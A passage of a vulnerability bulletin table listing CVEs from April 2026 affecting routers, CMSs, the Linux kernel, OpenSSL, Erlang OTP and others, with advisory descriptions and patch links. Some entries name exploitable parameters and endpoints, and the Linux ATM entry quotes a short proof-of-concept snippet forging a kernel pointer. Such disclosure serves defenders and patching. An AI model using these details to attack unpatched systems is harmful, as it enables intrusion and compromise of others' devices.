| n/a-- OpenAirInterface | In OpenAirInterface V2.2.0 AMF, Out of sequence messages causes incorrect state transition during UE registration procedure. This allows authentication to be bypassed completely. If a SecurityModeComplete message is sent after InitialUERegistration, a registration reject is received followed by a registration accept! This leads the UE to be registered without proper authentication. | 2026-04-07 | not yet calculated | CVE-2026-30079 | https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/77 |
| n/a-- OpenAirInterface | OpenAirInterface v2.2.0 accepts Security Mode Complete without any integrity protection. Configuration has supported integrity NIA1 and NIA2. But if an UE sends initial registration request with only security capability IA0, OpenAirInterface accepts and proceeds. This downgrade security context can lead to the possibility of replay attack. | 2026-04-08 | not yet calculated | CVE-2026-30080 | https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/78 |
| chartbrew--chartbrew | Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.8.5, Chartbrew allows authenticated users to create API data connections with arbitrary URLs. The server fetches these URLs using request-promise without any IP address validation, enabling Server-Side Request Forgery attacks against internal networks and cloud metadata endpoints. This vulnerability is fixed in 4.8.5. | 2026-04-10 | not yet calculated | CVE-2026-30232 | https://github.com/chartbrew/chartbrew/security/advisories/GHSA-p4rg-967r-w4cv https://github.com/chartbrew/chartbrew/commit/9c4a7e2b02acb25f0782bd4ac1f16407d59c2df1 |
| n/a-- Daylight Studio FuelCMS | Daylight Studio FuelCMS v1.5.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability in the Blocks module. | 2026-04-07 | not yet calculated | CVE-2026-30460 | https://github.com/daylightstudio/FUEL-CMS/ http://daylight.com http://fuelcms.com https://pentest-tools.com/PTT-2025-027-Improper-Authorization.pdf |
| Ms4w[.]com -- GatewayGeo Mapserver | A Dynamic-link Library Injection vulnerability in GatewayGeo MapServer for Windows version 5 allows attackers to escalate privileges via a crafted executable. | 2026-04-09 | not yet calculated | CVE-2026-30478 | https://ms4w.com https://github.com/penjaminTester/Research/tree/main/CVE-2026-30478 |
| Ms4w[.]com -- GatewayGeo Mapserver | A Dynamic-link Library Injection vulnerability in OSGeo Project MapServer before v8.0 allows attackers to execute arbitrary code via a crafted executable. | 2026-04-09 | not yet calculated | CVE-2026-30479 | https://mapserver.org/index.html https://github.com/penjaminTester/Research/tree/main/CVE-2026-30479 |
| Aziot[.]life -- AZIOT 1 Node Smart Switch | An information disclosure vulnerability exists in AZIOT 1 Node Smart Switch (16amp)- WiFi/Bluetooth Enabled Software Version: 1.1.9 due to improper access control on the UART debug interface. An attacker with physical access can connect to the UART interface and obtain sensitive information from the serial console without authentication. | 2026-04-06 | not yet calculated | CVE-2026-30613 | http://aziot.com https://github.com/dumbermore/tuya/blob/main/README.md |
| TP-Link Systems Inc.--AX53 v1.0 | A stack-based buffer overflow in the tmpServer module of TP-Link Archer AX53 v1.0 allows an authenticated adjacent attacker to trigger a segmentation fault and potentially execute arbitrary code via a specially crafted configuration file. Successful exploitation may cause a crash and could allow arbitrary code execution, enabling modification of device state, exposure of sensitive data, or further compromise of device integrity. This issue affects AX53 v1.0: before 1.7.1 Build 20260213. | 2026-04-08 | not yet calculated | CVE-2026-30814 | https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/ |
| TP-Link Systems Inc.--AX53 v1.0 | An OS command injection vulnerability in the OpenVPN module of TP-Link Archer AX53 v1.0 allows an authenticated adjacent attacker to execute system commands when a specially crafted configuration file is processed due to insufficient input validation. Successful exploitation may allow modification of configuration files, disclosure of sensitive information, or further compromise of device integrity. This issue affects AX53 v1.0: before 1.7.1 Build 20260213. | 2026-04-08 | not yet calculated | CVE-2026-30815 | https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/ |
| TP-Link Systems Inc.--AX53 v1.0 | An external control of configuration vulnerability in the OpenVPN module of TP-Link AX53 v1.0 allows an authenticated adjacent attacker to read arbitrary file when a malicious configuration file is processed. Successful exploitation may allow unauthorized access to arbitrary files on the device, potentially exposing sensitive information.This issue affects AX53 v1.0: before 1.7.1 Build 20260213. | 2026-04-08 | not yet calculated | CVE-2026-30816 | https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/ |
| TP-Link Systems Inc.--AX53 v1.0 | An external configuration control vulnerability in the OpenVPN module of TP-Link AX53 v1.0 allows an authenticated adjacent attacker to read arbitrary files when a malicious configuration file is processed. Successful exploitation may allow unauthorized access to arbitrary files on the device, potentially exposing sensitive information.This issue affects AX53 v1.0: before 1.7.1 Build 20260213. | 2026-04-08 | not yet calculated | CVE-2026-30817 | https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/ |
| TP-Link Systems Inc.--AX53 v1.0 | An OS command injection vulnerability in the dnsmasq module of TP-Link Archer AX53 v1.0 allows an authenticated adjacent attacker to execute arbitrary code when a specially crafted configuration file is processed due to insufficient input validation. Successful exploitation may allow the attacker to modify device configuration, access sensitive information, or further compromise system integrity. This issue affects AX53 v1.0: before 1.7.1 Build 20260213. | 2026-04-08 | not yet calculated | CVE-2026-30818 | https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/ |
| n/a--n/a | A Server-Side Request Forgery (SSRF) vulnerability exists in the Print Format functionality of ERPNext v16.0.1 and Frappe Framework v16.1.1, where user-supplied HTML is insufficiently sanitized before being rendered into PDF. When generating PDFs from user-controlled HTML content, the application allows the inclusion of HTML elements such as <iframe> that reference external resources. The PDF rendering engine automatically fetches these resources on the server side. An attacker can abuse this behavior to force the server to make arbitrary HTTP requests to internal services, including cloud metadata endpoints, potentially leading to sensitive information disclosure. | 2026-04-08 | not yet calculated | CVE-2026-31017 | http://frappe.com https://github.com/PhDg1410/CVE/tree/main/CVE-2026-31017 |
| n/a--n/a | A vulnerability was identified in stata-mcp prior to v1.13.0 where insufficient validation of user-supplied Stata do-file content can lead to command execution. | 2026-04-08 | not yet calculated | CVE-2026-31040 | https://github.com/SepineTam/stata-mcp/issues/20 https://github.com/SepineTam/stata-mcp/pull/21 https://github.com/SepineTam/stata-mcp/commit/52413ce https://github.com/SepineTam/stata-mcp/releases/tag/v1.13.0 |
| n/a--n/a | A double free vulnerability exists in librz/bin/format/le/le.c in the function le_load_fixup_record(). When processing malformed or circular LE fixup chains, relocation entries may be freed multiple times during error handling. A specially crafted LE binary can trigger heap corruption and cause the application to crash, resulting in a denial-of-service condition. An attacker with a crafted binary could cause a denial of service when the tool is integrated on a service pipeline. | 2026-04-06 | not yet calculated | CVE-2026-31053 | https://github.com/rizinorg/rizin/issues/5753 https://github.com/rizinorg/rizin/pull/5795 |
| n/a-- Aggressive HiPER Router 1200GW | UTT Aggressive HiPER 1200GW v2.5.3-170306 was discovered to contain a buffer overflow in the timeRangeName parameter of the formConfigDnsFilterGlobal function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-06 | not yet calculated | CVE-2026-31058 | https://github.com/zxq0408/Vul202601/blob/main/2.md |
| n/a-- Aggressive HiPER Router 520W | A remote command execution (RCE) vulnerability in the /goform/formDia component of UTT Aggressive HiPER 520W v3v1.7.7-180627 allows attackers to execute arbitrary commands via a crafted string. | 2026-04-06 | not yet calculated | CVE-2026-31059 | https://github.com/zxq0408/Vul202601/blob/main/9.md |
| n/a-- Aggressive HiPER Router 810G | UTT Aggressive HiPER 810G v3v1.7.7-171114 was discovered to contain a buffer overflow in the notes parameter of the formGroupConfig function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-06 | not yet calculated | CVE-2026-31060 | https://github.com/zxq0408/Vul202601/blob/main/5.md |
| n/a-- Aggressive HiPER Router 810G | UTT Aggressive HiPER 810G v3v1.7.7-171114 was discovered to contain a buffer overflow in the timestart parameter of the ConfigAdvideo function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-06 | not yet calculated | CVE-2026-31061 | https://github.com/zxq0408/Vul202601/blob/main/1.md |
| n/a-- Aggressive HiPER Router 510W | UTT Aggressive 520W v3v1.7.7-180627 was discovered to contain a buffer overflow in the filename parameter of the formFtpServerDirConfig function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-06 | not yet calculated | CVE-2026-31062 | https://github.com/zxq0408/Vul202601/blob/main/7.md |
| n/a-- Aggressive HiPER Router 1200GW | UTT Aggressive HiPER 1200GW v2.5.3-170306 was discovered to contain a buffer overflow in the pools parameter of the formArpBindConfig function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-06 | not yet calculated | CVE-2026-31063 | https://github.com/zxq0408/Vul202601/blob/main/4.md |
| n/a-- Aggressive HiPER Router 520W | UTT Aggressive 520W v3v1.7.7-180627 was discovered to contain a buffer overflow in the addCommand parameter of the formConfigCliForEngineerOnly function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-06 | not yet calculated | CVE-2026-31065 | https://github.com/zxq0408/Vul202601/blob/main/8.md |
| n/a-- Aggressive HiPER Router 810G | UTT Aggressive HiPER 810G v3v1.7.7-171114 was discovered to contain a buffer overflow in the selDateType parameter of the formTaskEdit function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-06 | not yet calculated | CVE-2026-31066 | https://github.com/zxq0408/Vul202601/blob/main/6.md |
| n/a-- UTT Aggressive 520W | A remote command execution (RCE) vulnerability in the /goform/formReleaseConnect component of UTT Aggressive 520W v3v1.7.7-180627 allows attackers to execute arbitrary commands via a crafted string. | 2026-04-06 | not yet calculated | CVE-2026-31067 | https://github.com/zxq0408/Vul202601/blob/main/10.md |
| n/a-- Kaleris YMS | Incorrect access control in Kaleris YMS v7.2.2.1 allows authenticated attackers with only the shipping/receiving role to view the truck's dashboard resources. | 2026-04-06 | not yet calculated | CVE-2026-31150 | https://kaleris.com/solutions/yard-management/ https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31150 |
| n/a-- Kaleris YMS | An issue in the login mechanism of Kaleris YMS v7.2.2.1 allows attackers to bypass login verification to access the application 's resources. | 2026-04-06 | not yet calculated | CVE-2026-31151 | https://kaleris.com/solutions/yard-management/ https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31151 |
| Bynder[.]com -- Bynder v0.1.394 | A stored cross-site scripting (XSS) vulnerability in Bynder v0.1.394 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | 2026-04-06 | not yet calculated | CVE-2026-31153 | https://www.bynder.com/en/ https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31153 |
| Totolink[.]net -- A3300R router | An issue was discovered in ToToLink A3300R firmware v17.0.0cu.557_B20221024 allowing attackers to execute arbitrary commands via the stun-pass parameter to /cgi-bin/cstecgi.cgi. | 2026-04-09 | not yet calculated | CVE-2026-31170 | https://github.com/Svigo-o/TOTOLINK-Vul/tree/main/totolink-a3300r-stun-pass-cmd-injection |
| Altenar[.]com -- Sportsbook Software Platform SB2 v.2.0 | Cross Site Scripting vulnerability in Altenar Sportsbook Software Platform (SB2) v.2.0 allows a remote attacker to obtain sensitive information and execute arbitrary code via the URL parameter | 2026-04-10 | not yet calculated | CVE-2026-31262 | https://github.com/nikolas-ch/CVEs/tree/main/Altenar_SportsBook_Platform_SB2/ORtoXSS https://github.com/nikolas-ch/CVEs/blob/main/Altenar_SportsBook_Platform_SB2/ORtoXSS/ORtoXSS.txt |
| n/a--n/a | megagao production_ssm v1.0 contains an authorization bypass vulnerability in the user addition functionality. The insert() method in UserController.java lacks authentication checks, allowing unauthenticated attackers to create super administrator accounts by directly accessing the /user/insert endpoint. This leads to complete system compromise. | 2026-04-07 | not yet calculated | CVE-2026-31271 | https://github.com/clockw1se0v0/Vul/blob/main/production_ssm/Unauthorized.md |
| n/a--n/a | MRCMS 3.1.2 contains an access control vulnerability. The save() method in src/main/java/org/marker/mushroom/controller/UserController.java lacks proper authorization validation, enabling direct addition of super administrator accounts without authentication. | 2026-04-07 | not yet calculated | CVE-2026-31272 | https://github.com/clockw1se0v0/Vul/blob/main/MRCMS/Unauthorized.md |
| n/a-- Feehi CMS | An authenticated stored cross-site scripting (XSS) vulnerability in the creation/editing module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Content field. | 2026-04-06 | not yet calculated | CVE-2026-31313 | http://feehi.com https://github.com/liufee/cms/issues/80 |
| n/a-- Feehi CMS | An authenticated stored cross-site scripting (XSS) vulnerability in Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Page Sign parameter. | 2026-04-06 | not yet calculated | CVE-2026-31350 | https://github.com/liufee/cms https://github.com/liufee/cms/issues/82 |
| n/a-- Feehi CMS | An authenticated stored cross-site scripting (XSS) vulnerability in the creation/editing module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Title parameter. | 2026-04-06 | not yet calculated | CVE-2026-31351 | https://github.com/liufee/cms https://github.com/liufee/cms/issues/81 |
| n/a-- Feehi CMS | An authenticated stored cross-site scripting (XSS) vulnerability in the Role Management module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Role Name parameter. | 2026-04-06 | not yet calculated | CVE-2026-31352 | https://github.com/liufee/cms https://github.com/liufee/cms/issues/83 |
| n/a-- Feehi CMS | An authenticated stored cross-site scripting (XSS) vulnerability in the Category module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name parameter. | 2026-04-06 | not yet calculated | CVE-2026-31353 | https://github.com/liufee/cms https://github.com/liufee/cms/issues/84 |
| n/a-- Feehi CMS | Multiple authenticated stored cross-site scripting (XSS) vulnerabilities in the Permissions module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Group, Category or Description parameters. | 2026-04-06 | not yet calculated | CVE-2026-31354 | https://github.com/liufee/cms https://github.com/liufee/cms/issues/85 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: dvb-net: fix OOB access in ULE extension header tables The ule_mandatory_ext_handlers[] and ule_optional_ext_handlers[] tables in handle_one_ule_extension() are declared with 255 elements (valid indices 0-254), but the index htype is derived from network-controlled data as (ule_sndu_type & 0x00FF), giving a range of 0-255. When htype equals 255, an out-of-bounds read occurs on the function pointer table, and the OOB value may be called as a function pointer. Add a bounds check on htype against the array size before either table is accessed. Out-of-range values now cause the SNDU to be discarded. | 2026-04-06 | not yet calculated | CVE-2026-31405 | https://git.kernel.org/stable/c/29ef43ceb121d67b87f4cbb08439e4e9e732eff8 https://git.kernel.org/stable/c/1a6da3dbb9985d00743073a1cc1f96e59f5abc30 https://git.kernel.org/stable/c/145e50c2c700fa52b840df7bab206043997dd18e https://git.kernel.org/stable/c/8bde543d2a5f935ba2a6a6325a2e02f8a9256fbe https://git.kernel.org/stable/c/f2b65dcb78c8990e4c68a906627433be1fe38a92 https://git.kernel.org/stable/c/24d87712727a5017ad142d63940589a36cd25647 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: Fix work re-schedule after cancel in xfrm_nat_keepalive_net_fini() After cancel_delayed_work_sync() is called from xfrm_nat_keepalive_net_fini(), xfrm_state_fini() flushes remaining states via __xfrm_state_delete(), which calls xfrm_nat_keepalive_state_updated() to re-schedule nat_keepalive_work. The following is a simple race scenario: cpu0 cpu1 cleanup_net() [Round 1] ops_undo_list() xfrm_net_exit() xfrm_nat_keepalive_net_fini() cancel_delayed_work_sync(nat_keepalive_work); xfrm_state_fini() xfrm_state_flush() xfrm_state_delete(x) __xfrm_state_delete(x) xfrm_nat_keepalive_state_updated(x) schedule_delayed_work(nat_keepalive_work); rcu_barrier(); net_complete_free(); net_passive_dec(net); llist_add(&net->defer_free_list, &defer_free_list); cleanup_net() [Round 2] rcu_barrier(); net_complete_free() kmem_cache_free(net_cachep, net); nat_keepalive_work() // on freed net To prevent this, cancel_delayed_work_sync() is replaced with disable_delayed_work_sync(). | 2026-04-06 | not yet calculated | CVE-2026-31406 | https://git.kernel.org/stable/c/32d0f44c2f14d60fe8e920e69a28c11051543ec1 https://git.kernel.org/stable/c/2255ed6adbc3100d2c4a83abd9d0396d04b87792 https://git.kernel.org/stable/c/21f2fc49ca6faa393c31da33b8a4e6c41fc84c13 https://git.kernel.org/stable/c/daf8e3b253aa760ff9e96c7768a464bc1d6b3c90 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: conntrack: add missing netlink policy validations Hyunwoo Kim reports out-of-bounds access in sctp and ctnetlink. These attributes are used by the kernel without any validation. Extend the netlink policies accordingly. Quoting the reporter: nlattr_to_sctp() assigns the user-supplied CTA_PROTOINFO_SCTP_STATE value directly to ct->proto.sctp.state without checking that it is within the valid range. [..] and: ... with exp->dir = 100, the access at ct->master->tuplehash[100] reads 5600 bytes past the start of a 320-byte nf_conn object, causing a slab-out-of-bounds read confirmed by UBSAN. | 2026-04-06 | not yet calculated | CVE-2026-31407 | https://git.kernel.org/stable/c/0fbae1e74493d5a160a70c51aeba035d8266ea7d https://git.kernel.org/stable/c/f900e1d77ee0ef87bfb5ab3fe60f0b3d8ad5ba05 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: SCO: Fix use-after-free in sco_recv_frame() due to missing sock_hold sco_recv_frame() reads conn->sk under sco_conn_lock() but immediately releases the lock without holding a reference to the socket. A concurrent close() can free the socket between the lock release and the subsequent sk->sk_state access, resulting in a use-after-free. Other functions in the same file (sco_sock_timeout(), sco_conn_del()) correctly use sco_sock_hold() to safely hold a reference under the lock. Fix by using sco_sock_hold() to take a reference before releasing the lock, and adding sock_put() on all exit paths. | 2026-04-06 | not yet calculated | CVE-2026-31408 | https://git.kernel.org/stable/c/b0a7da0e3f7442545f071499beb36374714bb9de https://git.kernel.org/stable/c/45aaca995e4a7a05b272a58e7ab2fff4f611b8f1 https://git.kernel.org/stable/c/108b81514d8f2535eb16651495cefb2250528db3 https://git.kernel.org/stable/c/7197462e90b8ce15caa1ae15d4bc2bb8cd21b11e https://git.kernel.org/stable/c/e76e8f0581ef555eacc11dbb095e602fb30a5361 https://git.kernel.org/stable/c/598dbba9919c5e36c54fe1709b557d64120cb94b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: unset conn->binding on failed binding request When a multichannel SMB2_SESSION_SETUP request with SMB2_SESSION_REQ_FLAG_BINDING fails ksmbd sets conn->binding = true but never clears it on the error path. This leaves the connection in a binding state where all subsequent ksmbd_session_lookup_all() calls fall back to the global sessions table. This fix it by clearing conn->binding = false in the error path. | 2026-04-06 | not yet calculated | CVE-2026-31409 | https://git.kernel.org/stable/c/d073870dab8f6dadced81d13d273ff0b21cb7f4e https://git.kernel.org/stable/c/6ebef4a220a1ebe345de899ebb9ae394206fe921 https://git.kernel.org/stable/c/89afe5e2dbea6e9d8e5f11324149d06fa3a4efca https://git.kernel.org/stable/c/9feb2d1bf86d9e5e66b8565f37f8d3a7d281a772 https://git.kernel.org/stable/c/6260fc85ed1298a71d24a75d01f8b2e56d489a60 https://git.kernel.org/stable/c/282343cf8a4a5a3603b1cb0e17a7083e4a593b03 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: use volume UUID in FS_OBJECT_ID_INFORMATION Use sb->s_uuid for a proper volume identifier as the primary choice. For filesystems that do not provide a UUID, fall back to stfs.f_fsid obtained from vfs_statfs(). | 2026-04-06 | not yet calculated | CVE-2026-31410 | https://git.kernel.org/stable/c/ce00616bc1df675bfdacc968f2bf7c51f4669227 https://git.kernel.org/stable/c/3d80ebe6d1b7bc9ad20fd9b0c1a0c56d804f8a0a https://git.kernel.org/stable/c/c283a6ffe6d5d6e5594d991286b9ce15951572e1 https://git.kernel.org/stable/c/3a64125730cabc34fccfbc230c2667c2e14f7308 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: atm: fix crash due to unvalidated vcc pointer in sigd_send() Reproducer available at [1]. The ATM send path (sendmsg -> vcc_sendmsg -> sigd_send) reads the vcc pointer from msg->vcc and uses it directly without any validation. This pointer comes from userspace via sendmsg() and can be arbitrarily forged: int fd = socket(AF_ATMSVC, SOCK_DGRAM, 0); ioctl(fd, ATMSIGD_CTRL); // become ATM signaling daemon struct msghdr msg = { .msg_iov = &iov, ... }; *(unsigned long *)(buf + 4) = 0xdeadbeef; // fake vcc pointer sendmsg(fd, &msg, 0); // kernel dereferences 0xdeadbeef In normal operation, the kernel sends the vcc pointer to the signaling daemon via sigd_enq() when processing operations like connect(), bind(), or listen(). The daemon is expected to return the same pointer when responding. However, a malicious daemon can send arbitrary pointer values. Fix this by introducing find_get_vcc() which validates the pointer by searching through vcc_hash (similar to how sigd_close() iterates over all VCCs), and acquires a reference via sock_hold() if found. Since struct atm_vcc embeds struct sock as its first member, they share the same lifetime. Therefore using sock_hold/sock_put is sufficient to keep the vcc alive while it is being used. Note that there may be a race with sigd_close() which could mark the vcc with various flags (e.g., ATM_VF_RELEASED) after find_get_vcc() returns. However, sock_hold() guarantees the memory remains valid, so this race only affects the logical state, not memory safety. [1]: https://gist.github.com/mrpre/1ba5949c45529c511152e2f4c755b0f3 | 2026-04-08 | not yet calculated | CVE-2026-31411 | https://git.kernel.org/stable/c/c96549d07dfdd51aadf0722cfb40711574424840 https://git.kernel.org/stable/c/1c8bda3df028d5e54134077dcd09f46ca8cfceb5 https://git.kernel.org/stable/c/3e1a8b00095246a9a2b46b57f6d471c6d3c00ed2 https://git.kernel.org/stable/c/e3f80666c2739296c3b69a127300455c43aa1067 https://git.kernel.org/stable/c/21c303fec138c002f90ed33bce60e807d53072bb https://git.kernel.org/stable/c/69d3f9ee5489e6e8b66defcfa226e91d82393297 https://git.kernel.org/stable/c/440c9a5fc477a8ee259d8bf669531250b8398651 https://git.kernel.org/stable/c/ae88a5d2f29b69819dc7b04086734439d074a643 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_mass_storage: Fix potential integer overflow in check_command_size_in_blocks() The `check_command_size_in_blocks()` function calculates the data size in bytes by left shifting `common->data_size_from_cmnd` by the block size (`common->curlun->blkbits`). However, it does not validate whether this shift operation will cause an integer overflow. Initially, the block size is set up in `fsg_lun_open()` , and the `common->data_size_from_cmnd` is set up in `do_scsi_command()`. During initialization, there is no integer overflow check for the interaction between two variables. So if a malicious USB host sends a SCSI READ or WRITE command requesting a large amount of data (`common->data_size_from_cmnd`), the left shift operation can wrap around. This results in a truncated data size, which can bypass boundary checks and potentially lead to memory corruption or out-of-bounds accesses. Fix this by using the check_shl_overflow() macro to safely perform the shift and catch any overflows. | 2026-04-10 | not yet calculated | CVE-2026-31412 | https://git.kernel.org/stable/c/91817ad5452defe69bc7bc0e355f0ed5d01125cc https://git.kernel.org/stable/c/ce0caaed5940162780c5c223b8ae54968a5f059b https://git.kernel.org/stable/c/228b37936376143f4b60cc6828663f6eaceb81b5 https://git.kernel.org/stable/c/3428dc5520c811e66622b2f5fa43341bf9a1f8b3 https://git.kernel.org/stable/c/387ebb0453b99d71491419a5dc4ab4bee0cacbac https://git.kernel.org/stable/c/8479891d1f04a8ce55366fe4ca361ccdb96f02e1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix unsound scalar forking in maybe_fork_scalars() for BPF_OR maybe_fork_scalars() is called for both BPF_AND and BPF_OR when the source operand is a constant. When dst has signed range [-1, 0], it forks the verifier state: the pushed path gets dst = 0, the current path gets dst = -1. For BPF_AND this is correct: 0 & K == 0. For BPF_OR this is wrong: 0 | K == K, not 0. The pushed path therefore tracks dst as 0 when the runtime value is K, producing an exploitable verifier/runtime divergence that allows out-of-bounds map access. Fix this by passing env->insn_idx (instead of env->insn_idx + 1) to push_stack(), so the pushed path re-executes the ALU instruction with dst = 0 and naturally computes the correct result for any opcode. | 2026-04-12 | not yet calculated | CVE-2026-31413 | https://git.kernel.org/stable/c/342aa1ee995ef5bbf876096dc3a5e51218d76fa4 https://git.kernel.org/stable/c/58bd87d0e69204dbd739e4387a1edb0c4b1644e7 https://git.kernel.org/stable/c/d13281ae7ea8902b21d99d10a2c8caf0bdec0455 https://git.kernel.org/stable/c/c845894ebd6fb43226b3118d6b017942550910c5 |
| OpenSSL--OpenSSL | Issue summary: Converting an excessively large OCTET STRING value to a hexadecimal string leads to a heap buffer overflow on 32 bit platforms. Impact summary: A heap buffer overflow may lead to a crash or possibly an attacker controlled code execution or other undefined behavior. If an attacker can supply a crafted X.509 certificate with an excessively large OCTET STRING value in extensions such as the Subject Key Identifier (SKID) or Authority Key Identifier (AKID) which are being converted to hex, the size of the buffer needed for the result is calculated as multiplication of the input length by 3. On 32 bit platforms, this multiplication may overflow resulting in the allocation of a smaller buffer and a heap buffer overflow. Applications and services that print or log contents of untrusted X.509 certificates are vulnerable to this issue. As the certificates would have to have sizes of over 1 Gigabyte, printing or logging such certificates is a fairly unlikely operation and only 32 bit platforms are affected, this issue was assigned Low severity. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-04-07 | not yet calculated | CVE-2026-31789 | OpenSSL Advisory 3.6.2 git commit 3.5.6 git commit 3.4.5 git commit 3.3.7 git commit 3.0.20 git commit |
| OpenSSL--OpenSSL | Issue summary: Applications using RSASVE key encapsulation to establish a secret encryption key can send contents of an uninitialized memory buffer to a malicious peer. Impact summary: The uninitialized buffer might contain sensitive data from the previous execution of the application process which leads to sensitive data leakage to an attacker. RSA_public_encrypt() returns the number of bytes written on success and -1 on error. The affected code tests only whether the return value is non-zero. As a result, if RSA encryption fails, encapsulation can still return success to the caller, set the output lengths, and leave the caller to use the contents of the ciphertext buffer as if a valid KEM ciphertext had been produced. If applications use EVP_PKEY_encapsulate() with RSA/RSASVE on an attacker-supplied invalid RSA public key without first validating that key, then this may cause stale or uninitialized contents of the caller-provided ciphertext buffer to be disclosed to the attacker in place of the KEM ciphertext. As a workaround calling EVP_PKEY_public_check() or EVP_PKEY_public_check_quick() before EVP_PKEY_encapsulate() will mitigate the issue. The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.1 and 3.0 are affected by this issue. | 2026-04-07 | not yet calculated | CVE-2026-31790 | OpenSSL Advisory 3.6.2 git commit 3.5.6 git commit 3.4.5 git commit 3.3.7 git commit 3.0.20 git commit |
| Sonatype--Nexus Repository | A vulnerability in the task management component of Sonatype Nexus Repository versions 3.22.1 through 3.90.2 allows an authenticated attacker with task creation permissions to execute arbitrary code, bypassing the nexus.scripts.allowCreation security control. | 2026-04-08 | not yet calculated | CVE-2026-3199 | https://help.sonatype.com/en/sonatype-nexus-repository-3-91-0-release-notes.html https://support.sonatype.com/hc/en-us/articles/50615414548499 |
| Erlang--OTP | Improper Certificate Validation vulnerability in Erlang OTP public_key (pubkey_ocsp module) allows OCSP designated-responder authorization bypass via missing signature verification. The OCSP response validation in public_key:pkix_ocsp_validate/5 does not verify that a CA-designated responder certificate was cryptographically signed by the issuing CA. Instead, it only checks that the responder certificate's issuer name matches the CA's subject name and that the certificate has the OCSPSigning extended key usage. An attacker who can intercept or control OCSP responses can create a self-signed certificate with a matching issuer name and the OCSPSigning EKU, and use it to forge OCSP responses that mark revoked certificates as valid. This affects SSL/TLS clients using OCSP stapling, which may accept connections to servers with revoked certificates, potentially transmitting sensitive data to compromised servers. Applications using the public_key:pkix_ocsp_validate/5 API directly are also affected, with impact depending on usage context. This vulnerability is associated with program files lib/public_key/src/pubkey_ocsp.erl and program routines pubkey_ocsp:is_authorized_responder/3. This issue affects OTP from OTP 27.0 until OTP 28.4.2 and 27.3.4.10 corresponding to public_key from 1.16 until 1.20.3 and 1.17.1.2, and ssl from 11.2 until 11.5.4 and 11.2.12.7. | 2026-04-07 | not yet calculated | CVE-2026-32144 | https://github.com/erlang/otp/security/advisories/GHSA-gxrm-pf64-99xm https://cna.erlef.org/cves/CVE-2026-32144.html https://osv.dev/vulnerability/EEF-CVE-2026-32144 https://www.erlang.org/doc/system/versions.html#order-of-versions https://github.com/erlang/otp/commit/ac7ff528be857c5d35eb29c7f24106e3a16d4891 https://github.com/erlang/otp/commit/49033a6d93a5be0ee0dce04e1fb8b4ae7de1e0c0 |
| Gleam--Gleam | Improper path validation vulnerability in the Gleam compiler's handling of git dependencies allows arbitrary file system modification during dependency download. Dependency names from gleam.toml and manifest.toml are incorporated into filesystem paths without sufficient validation or confinement to the intended dependency directory, allowing attacker-controlled paths (via relative traversal such as ../ or absolute paths) to target filesystem locations outside that directory. When resolving git dependencies (e.g. via gleam deps download), the computed path is used for filesystem operations including directory deletion and creation. This vulnerability occurs during the dependency resolution and download phase, which is generally expected to be limited to fetching and preparing dependencies within a confined directory. A malicious direct or transitive git dependency can exploit this issue to delete and overwrite arbitrary directories outside the intended dependency directory, including attacker-chosen absolute paths, potentially causing data loss. In some environments, this may be further leveraged to achieve code execution, for example by overwriting git hooks or shell configuration files. This issue affects Gleam from 1.9.0-rc1 until 1.15.3 and 1.16.0-rc1. | 